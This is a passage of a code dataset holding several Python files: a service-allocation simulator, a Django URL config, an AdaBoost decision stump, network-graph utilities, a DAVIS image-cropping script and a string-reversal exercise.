self.utilityValue - min\n if logLevel > 0:\n print('\\t\\tRound {}:'.format(self.roundCount))\n print('\\t\\t\\tmin: {:.4}, last min: {:.4} -> diff: {:.4}'.format(min, self.utilityValue, diff))\n if diff > self.epsilon:\n self.utilityValue = copy.deepcopy(min)\n self.I = copy.deepcopy(minI)\n self.totalUtilityList.append(self.utilityValue)\n if min > self.epsilon:\n return True\n return False\n\n def run(self, nearest=False, random=False, logLevel=0, verbose=False):\n self.clear()\n if random or nearest:\n for s in self.services:\n if random:\n s.selectRandom()\n else:\n s.selectNearest()\n else:\n for service in self.services:\n service.initialize()\n while True:\n if not self.round(logLevel=logLevel, verbose=verbose):\n self.solution = self.nameLessFunction(I=self.I, logLevel=4, verbose=verbose)[1]\n print('\\t\\tFinish')\n break\n\n def totalCost(self):\n return self.utilityValue\n\n def clear(self):\n self.totalUtilityList = []\n self.utilityValue = 1e12\n self.roundCount = 0\n for node in self.computationNodes:\n node.reset()\n for service in self.services:\n service.reset()\n self.I = np.zeros((len(self.computationNodes), len(self.services)),dtype=bool)\n\n def reset(self):\n self.totalUtilityList = []\n self.utilityValue = 1e12\n self.roundCount = 0\n self.computationNodes = []\n self.services = []\n\n def printResults(self):\n print(\"Services:\")\n for service in self.services:\n print(\"#{}\".format(service.index + 1))\n nodeIndex = service.node\n if nodeIndex:\n node = self.computationNodes[nodeIndex]\n print(\"\\tR:{}\".format(service.R))\n print(\"\\tNode #{}-> C:{}, U:{}\".format(nodeIndex, node.C, node.U))\n print(\"\\tprice: {}, r:{}, u:{}\".format(node.highestBid, service.rates[nodeIndex], node.C*node.U/service.F))\n else:\n print(\"\\tNo allocation\")\n\n def plot(self, drawLines=False):\n font = {'family' : 'Times New Roman', 'size' : 25}\n matplotlib.rc('font', **font)\n matplotlib.rc('lines', linewidth=4, markeredgewidth=3, markersize=10)\n matplotlib.rc('grid', linewidth=1.5, linestyle='-.')\n plt.clf()\n self._drawNetworkTopology()\n drawed = [False] * 2\n for node in self.computationNodes:\n position = node.position\n switch = node.switch\n if node.type == \"Edge\":\n type = 0\n else:\n type = 1\n plt.plot(position[0], position[1], 'b*' if node.type == \"Edge\" 
else 'c*', label = node.type + ' Computation Nodes' if drawed[type] == False else '')\n drawed[type] = True\n #plt.annotate(str(\"{:.2f}\".format(node.C*node.U)),xy=(node.position[0], node.position[1]), ha='center', va='bottom',color='blue')\n plt.plot([switch[\"position\"][0], position[0]], [switch[\"position\"][1], position[1]], 'k.-')\n for count, s in enumerate(self.services):\n plt.plot(s.center[0], s.center[1], 'r.', label= 'Services' if count == 0 else '')\n# if s.node:\n# position = self.fogNodes[s.node].position\n# plt.plot([position[0], s.center[0]], [position[1], s.center[1]], 'c.-')\n plt.legend()\n plt.show()\n\n def _drawNetworkTopology(self):\n for switch_list, color in zip(self.switches[0:2], ['r', 'g']):\n for switch in switch_list:\n plt.plot([switch[\"position\"][0], switch[\"parent\"][\"position\"][0]], [switch[\"position\"][1], switch[\"parent\"][\"position\"][1]], color + '.-')\n drawed = [False] * 3\n for switch_list, color, layer in zip(self.switches, ['rx', 'gx', 'bx'], range(3)):\n for switch in switch_list:\n plt.plot(switch[\"position\"][0], switch[\"position\"][1], color, label = 'Layer' + str(layer+1) + ' Switch' if drawed[layer] == False else '')\n drawed[layer] = True\n\n def plotNetworkTopology(self):\n plt.clf()\n self._drawNetworkTopology()\n plt.show()\n\n def plotOptimalityEvolution(self):\n plt.plot(range(1, len(self.totalUtilityList) + 1), self.totalUtilityList, 'g-')\n plt.show()\n","sub_path":"7/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353525135","text":"# -*- coding: utf-8 -*-\n# __author__ = 'budurli'\nfrom django.conf.urls import patterns, url\nfrom apps.exercises.views import (TeachersExerciseListView, TeacherDetailExerciseView, NewExerciseView,\n StatementView)\n\nurlpatterns = patterns(\n '',\n url(r'list/$', TeachersExerciseListView.as_view(), name='list'),\n url(r'(?P<pk>\d+)/detail/$', TeacherDetailExerciseView.as_view(), name='detail'), # capture-group name lost in extraction; 'pk' assumed (Django's DetailView convention)\n url(r'create/$', NewExerciseView.as_view(), name='create'),\n\n url(r'statement/$', StatementView.as_view(), name='statement')\n)","sub_path":"apps/exercises/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"647912350","text":"from numpy import *\ndef loadSimData():\n dataMat=matrix([[1.0,2.1],\n [2.0,1.1],\n [1.3,1.0],\n [1.0,1.0],\n [2.0,1.0]])\n classLabels=[1.0,1.0,-1.0,-1.0,1.0]\n return dataMat,classLabels\n\ndef stumpClassfy(dataMatrix,dimen,threshVal,threshIneq):\n '''Decision stump (a one-node tree): depending on threshIneq, mark entries of the given column as -1 when they are on one side of the threshold (<= for 'lt', > for 'gt').'''\n retArray=ones((shape(dataMatrix)[0],1))\n\n if threshIneq == 'lt':\n retArray[dataMatrix[:,dimen]<= threshVal]=-1.0\n else:\n retArray[dataMatrix[:,dimen]> threshVal]=-1.0\n return retArray\ndef buildStump(dataArr,classLabels,D):\n '''Find the best single-split decision stump for the weighted dataset.'''\n dataMatrix=mat(dataArr)\n labelMat=mat(classLabels).T\n m,n=shape(dataMatrix)\n numSteps=10.0 # number of threshold steps per feature\n bestStump={} # best stump found so far, stored as a dict\n bestClassEst=mat(zeros((m,1))) # predictions of the best stump\n minError=inf # minimum weighted error, initialised to +infinity\n for i in range(n):\n rangeMin=dataMatrix[:,i].min() # minimum of column i\n rangeMax=dataMatrix[:,i].max()\n stepSize=(rangeMax-rangeMin)/numSteps # step size\n for j in range(-1,int(numSteps)+1):\n for inequal in ['lt','gt']:\n threshVal=(rangeMin+float(j)*stepSize) # current threshold to test\n predictedVals=stumpClassfy(dataMatrix,i,threshVal,inequal)\n errArr=mat(ones((m,1)))\n 
errArr[predictedVals==labelMat]=0 # error indicator per sample; correctly classified entries set to 0\n weightedError=D.T*errArr # weighted error rate under the sample-weight vector D\n print(\"split:dim %d,thresh %.2f,thresh inequal:%s,the weighted error is :%.3f\"%(i,threshVal,inequal,weightedError))\n if weightedError<minError: # keep the stump with the lowest weighted error\n minError=weightedError\n bestClassEst=predictedVals.copy()\n bestStump['dim']=i\n bestStump['thresh']=threshVal\n bestStump['ineq']=inequal\n return bestStump,minError,bestClassEst\n\"\"\"\n>>> from tabulate import tabulate\n\n>>> table = [[\"Sun\",696000,1989100000],[\"Earth\",6371,5973.6],\n... [\"Moon\",1737,73.5],[\"Mars\",3390,641.85]]\n>>> print tabulate(table)\n----- ------ -------------\nSun 696000 1.9891e+09\nEarth 6371 5973.6\nMoon 1737 73.5\nMars 3390 641.85\n----- ------ -------------\n\"\"\"\n","sub_path":"2-nd/from week2/pList.py","file_name":"pList.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63146421","text":"import networkx as nx\nimport random\nimport numpy as np\n\n\ndef _random_subset(seq, m):\n \"\"\" Return m unique elements from seq.\n\n This differs from random.sample which can return repeated\n elements if seq holds repeated elements.\n \"\"\"\n targets = set()\n while len(targets) < m:\n x = random.choice(seq)\n targets.add(x)\n return targets\n\n\ndef dms_graph_basic(N, k0, m=5, seed=None):\n \"\"\"\n Build a Dorogovtsev-Mendes-Samukhin graph.\n\n Graph is 'basic' as we use the case m=m0 (as required for problem sheet m=m0=5).\n\n Usage: G=dms_graph_basic(N,k0)\n\n Input:\n N - Number of nodes\n k0 - initial attractiveness (additive offset in the attachment kernel)\n\n Output:\n G - A Networkx graph\n \"\"\"\n\n if seed is not None:\n random.seed(seed)\n\n G = nx.complete_graph(m)\n targets = list(range(m))\n repeated_nodes = list(range(m)) * (m - 1 + k0)\n source = m\n\n while source < N:\n G.add_edges_from(zip([source] * m, targets))\n repeated_nodes.extend(targets)\n repeated_nodes.extend([source] * (m + k0))\n targets = _random_subset(repeated_nodes, m)\n source += 1\n return G\n\n\ndef deg_dist(G):\n \"\"\"\n Builds the degree dist for a graph G\n\n Usage: d=deg_dist(G)\n\n Input:\n G - A graph with N nodes\n\n Output:\n d - A Numpy array of length N with d[k] = probability of degree k\n \"\"\"\n N = len(nx.nodes(G))\n degs = nx.degree_histogram(G) # get degree histogram (list)\n if len(degs) < N: # standardize length (for when we run many realizations)\n degs = degs + [0] * (N - len(degs))\n degs = np.asarray(degs, dtype=float) # make numpy array\n degs = degs / np.sum(degs)\n return degs\n\n\ndef knn(G, kmax=200):\n \"\"\"\n Get the neighbour distribution knn\n\n Usage: knn=knn(G,kmax)\n\n Input:\n G - a graph\n kmax - the max degree to consider\n\n Output:\n knn - a vector of length kmax. NOTE: We should be careful to interpret 0's in this vector properly. If knn[k]=0 this just means it is undefined and should be ignored when averaging over reps!!\n\n \"\"\"\n N = len(nx.nodes(G))\n knn = np.zeros(kmax) # the final vector\n A = nx.to_numpy_matrix(G) # get adj matrix as numpy array\n d = np.asarray(list(dict(nx.degree(G)).values()), dtype=float) # get degrees, convert to numpy, reshape.\n d = np.reshape(d, (1, N)) # So d[i] is degree of node i\n for k in range(kmax): # loop on k\n delta = np.equal(k, d).astype(int)\n delta = np.reshape(delta, (1, N)) # delta vector. delta[i]=1 if d[i]=k.\n t1 = np.multiply(np.multiply(np.multiply(A, delta.T), d), 1 / d.T) # numerator (uses broadcasting. 
Google me!)\n t1 = np.sum(np.sum(t1))\n t2 = np.sum(delta) # denominator\n if t2 != 0: # fill in Knn[k,r]\n knn[k] = t1 / t2\n return knn\n\n\ndef flatten(A):\n \"\"\"\n Flattens an array of dims nxm to a vector of shape 1x(n*m)\n\n Usage: f=flatten(A)\n \"\"\"\n return np.reshape(A, (1, -1))\n\n\ndef connected_comps_sizes(G):\n \"\"\"\n List of sizes of connected components, sorted largest first\n \"\"\"\n return [len(c) for c in sorted(nx.connected_components(G), key=len, reverse=True)]\n","sub_path":"graphUtils.py","file_name":"graphUtils.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251573333","text":"import argparse\nfrom pathlib import Path\n\nimport scipy.ndimage # plain \"import scipy\" does not load the ndimage submodule\nfrom skimage import io\nfrom PIL import Image\nfrom joblib import Parallel, delayed\nimport numpy as np\n\nimport davis\n# davis.io.imread_indexed\n\n\n_ANN_REL_PATH = Path(\"Annotations/Full-Resolution/\")\n_IMG_REL_PATH = Path(\"JPEGImages/Full-Resolution/\")\n\n_TRAIN_REL_PATH = Path(\"ImageSets/2017/train.txt\")\n_VAL_REL_PATH = Path(\"ImageSets/2017/val.txt\")\n\n\n\n\ndef main(cmdline):\n gen = gen_get_elems(cmdline.dataset, cmdline.outpath)\n\n if cmdline.workers == 0:\n for input_tuple in gen:\n process_seq(*input_tuple)\n\n else:\n par = Parallel(n_jobs=cmdline.workers)\n par(delayed(process_seq)(*input_tuple) for input_tuple in gen)\n\n\n\ndef gen_get_elems(base_path, out_path):\n\n ann_p = base_path / _ANN_REL_PATH\n img_p = base_path / _IMG_REL_PATH\n\n for sub_d in img_p.iterdir():\n name = sub_d.name\n outdir = out_path / name\n outdir.mkdir(exist_ok=True)\n yield sub_d, ann_p / name, outdir\n\n\n\ndef process_seq(img_d, ann_d, dest_d):\n\n\n ann_l = sorted(ann_d.glob(\"*.png\"))\n img_l = [img_d / (ann.stem + \".jpg\") for ann in ann_l] # ann.stem avoids rstrip(\"png\") eating trailing p/n/g characters\n\n annotations = np.array([davis.io.imread_indexed(str(ann))[0]\n for ann in ann_l])\n\n n_labels = np.unique(annotations)\n n_labels = n_labels[n_labels != 0]\n\n for lab_id in n_labels:\n out_f = dest_d / str(lab_id)\n out_f.mkdir(exist_ok=True)\n\n for ann, img_path in zip(annotations, img_l):\n objs = scipy.ndimage.find_objects(ann)\n img = io.imread(str(img_path))\n\n for ann_rng, ann_id in zip(objs,np.arange(1, len(objs) + 1)):\n \n if ann_rng is not None:\n formatted = cut_image(img, ann, ann_id, ann_rng)\n out_path = dest_d / str(ann_id) / img_path.name\n formatted.save(str(out_path))\n\n\n\n\n\n\ndef cut_image(image, annotation, ann_id, ann_rng, res_edge=240):\n\n pad_color = np.array((127, 127,127)).astype(np.uint8)\n final_img = np.tile(pad_color, image.shape[0:2] + (1,))\n final_img[annotation == ann_id, ...] 
= image[annotation == ann_id, ...]\n\n final_img = final_img[ann_rng]\n squared = make_square(Image.fromarray(final_img))\n \n resized = squared.resize((res_edge, res_edge))\n\n return resized\n\n\n \ndef make_square(im,fill_color=(127, 127, 127)):\n x, y = im.size\n size = max(x, y)\n new_im = Image.new('RGB', (size, size), fill_color)\n new_im.paste(im, ((size - x) // 2, (size - y) // 2))\n return new_im \n\n\n\ndef abs_path(path):\n return Path(path).resolve()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset\", type=abs_path,\n help=\"directory containing the davis full res dataset\")\n parser.add_argument(\"outpath\", type=abs_path,\n help=\"output directory\")\n parser.add_argument(\"-w\", \"--workers\", type=int, default=0, \n help=\"number of worker processes\")\n args = parser.parse_args()\n main(args)\n","sub_path":"scripts/fmtdavis.py","file_name":"fmtdavis.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286468713","text":"'''\nProblem:\nWrite a method that takes a given string as input and\nreturns a new string with the characters reversed.\nExample:\nInput: \"hello world\"\nOutput: \"dlrow olleh\"\nApproach:\nWalk the string from the last character to the first, or simply slice with s[::-1].\n'''\n\nclass Solution:\n \"\"\"\n @param s: a string\n @return: return a string\n \"\"\"\n def reverseString(self, s):\n # write your code here\n # Method 1: take the characters from back to front\n reverse_string = ''\n for i in range(len(s)):\n reverse_string += s[len(s)-(i+1)]\n return reverse_string\n # Method 2: return directly using a slice\n # return s[::-1]","sub_path":"1283_done.py","file_name":"1283_done.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
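A quick sanity check for the last record, assuming the Solution class exactly as defined there; the slice form from the commented-out second method produces the same result in one step.

    s = Solution()
    assert s.reverseString("hello world") == "dlrow olleh"
    # equivalent one-step reversal via slicing
    assert "hello world"[::-1] == "dlrow olleh"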